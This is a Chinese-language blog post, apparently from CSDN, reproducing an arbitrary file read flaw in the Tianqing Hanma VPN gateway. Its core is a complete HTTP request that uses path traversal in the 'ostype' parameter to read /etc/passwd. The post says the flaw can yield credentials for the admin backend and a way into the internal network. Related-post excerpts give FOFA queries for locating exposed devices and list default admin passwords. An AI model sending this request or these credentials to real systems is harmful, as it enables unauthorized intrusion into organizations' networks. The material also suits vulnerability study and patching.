[漏洞复现]天清汉马vpn任意文件读取漏洞及后利用进内网

于 2024-07-17 10:00:09 发布
阅读量330 收藏 2
点赞数 16
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LiangYueSec/article/details/140486174
版权

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

同时为了感谢师傅们的支持,我们的微信订阅号关注破百,订阅号的这篇文章下也有星球优惠券,先到先得!!

漏洞简介

天清汉马VPN安全网关以IPSec/SSL VPN二合一VPN安全网关为基础,提供身份认证、传输加密、访问控制、日志审计等安全功能,不仅能够为各企事业单位分支机构之间提供数据加密传输,还能够为移动办公用户提供安全、快速、易用的远程接入解决方案。攻击者可通过任意文件读取漏洞获取账号密码进入后台。

漏洞复现

poc如下

GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1
Host: 
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

后续利用的话就是通过任意文件读取漏洞可以获取账号密码进入后台。vpn进入后台后自然是可以进入内网了。具体详情可以加入星球查看。

LiangYueSec
关注
  • 16
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CNVD-2021-17391 启明天清汉马USG防火墙逻辑缺陷漏洞复现
afei001
04-24 1488
目录 1.前言 2.漏洞概述 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 6.漏洞修复 声明:请勿行非授权测试,否则后果自负。 1.前言 该漏洞是CNVD 4月8号收录的,那看来2021 HW第一天爆出来的洞就是这个了,不过该漏洞利用也要之前的弱口令作为支撑。 CNVD:h...
CNVD-2021-12793 启明天清汉马USG防火墙弱口令漏洞复现
afei001
04-24 1870
目录 1.前言 2.漏洞概述 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 6.漏洞修复 声明:请勿行非授权测试,否则后果自负。 1.前言 2021HW期间,互联网威胁情报中就有该漏洞。这个漏洞也挺无语的,因为在网上搜到最早是墨者学院的一个靶场。CNVD公开日期2021年3月11日,而这篇博客的时间是在19年7月份,无语吧。没想到FOFA随便找一下还真有,心也真够大的,放在公网上,默认密码都不改。 ...
(CNVD-2021-17391)|启明星辰-‘‘天清汉马USG防火墙‘‘逻辑漏洞
qq_17754023的博客
02-28 3873
0x01 漏洞说明 启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞,攻击者可利用漏洞从低权限越权到管理员权限,可行用户密码重置和权限设置等高权限操作 0x02 影响版本 天清汉马USG防火墙 0x03 漏洞复现 Fofa搜索标题:(注意:互联网的非授权利用属于违法行为) title='天清汉马USG防火墙' 通过百度文库查找到配置手册: 可以看见存在三种角色: 系统管理员:admin/venus.usg -----最高权限,可使用所有功能 审计员 ...
启明星辰 天清汉马USG防火墙(后台弱口令/任意用户权限)
qq_52469895的博客
04-11 7804
fofa语句: title="天清汉马USG防火墙" 默认账号密码 账号:useradmin 密码:venus.user 到后台后,入管理员页面 修改访问权限,即可使用该用户
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
天清汉马USG-FW-P防火墙用户使用手册.pdf
09-26
天清汉马USG-FW-P防火墙用户使用手册
启明星辰防火墙配置手册-天清汉马
08-15
启明星辰防火墙配置手册-天清汉马
天清汉马防火墙培训手册.pdf
04-14
天清汉马防火墙培训手册
天清汉马USG防火墙用户手册
08-13
VSOS是启明星辰USG设备使用的操作系统。可以通过命令行配置,也可以通过图形界面行配置。其中命令行配置除了可以通过console口连接,也可以通过SSH,Telnet客户端连接...本手册只介绍通过命令行的方式行配置管理。
天清汉马USG一体化安全网关-命令行用户手册
11-18
系统管理、系统配置、配置用户、配置认证用户、网络设置、配置安全域、配置NAT、DHCP、HA、DDNS、安全策略、防DOS攻击等等
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 412
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 269
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1353
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促医疗行业的健康发展。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 460
生产区访问DMZ需要行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 832
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
最新发布
TSINGSEE青犀视频官方技术博客
07-16 472
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员行处理。
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
tigerman20201的博客
07-13 265
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
非法闯入智能监测摄像机:安全守护的新利器
bova2022的博客
07-15 289
首先,它能够智能分析画面中的人物和物体,通过对比数据库识别可疑目标,自动过滤正常活动,减少误报。此外,很多智能摄像机支持远程监控,用户可以随时通过手机或电脑查看实时画面,确保安全无死角。在商业环境中,摄像机可以有效防止盗窃和破坏,提升商业安全防范水平。总之,非法闯入智能监测摄像机作为现代安防技术的重要组成部分,以其智能、高效的特性,正不断提升人们的安全感。随着技术的持续发展和应用场景的扩大,未来这些摄像机将在保护人们生命和财产安全方面发挥更加重要的作用,为我们的生活带来更多保障。
使用Python实现深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 555
通过以上步骤,我们实现了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值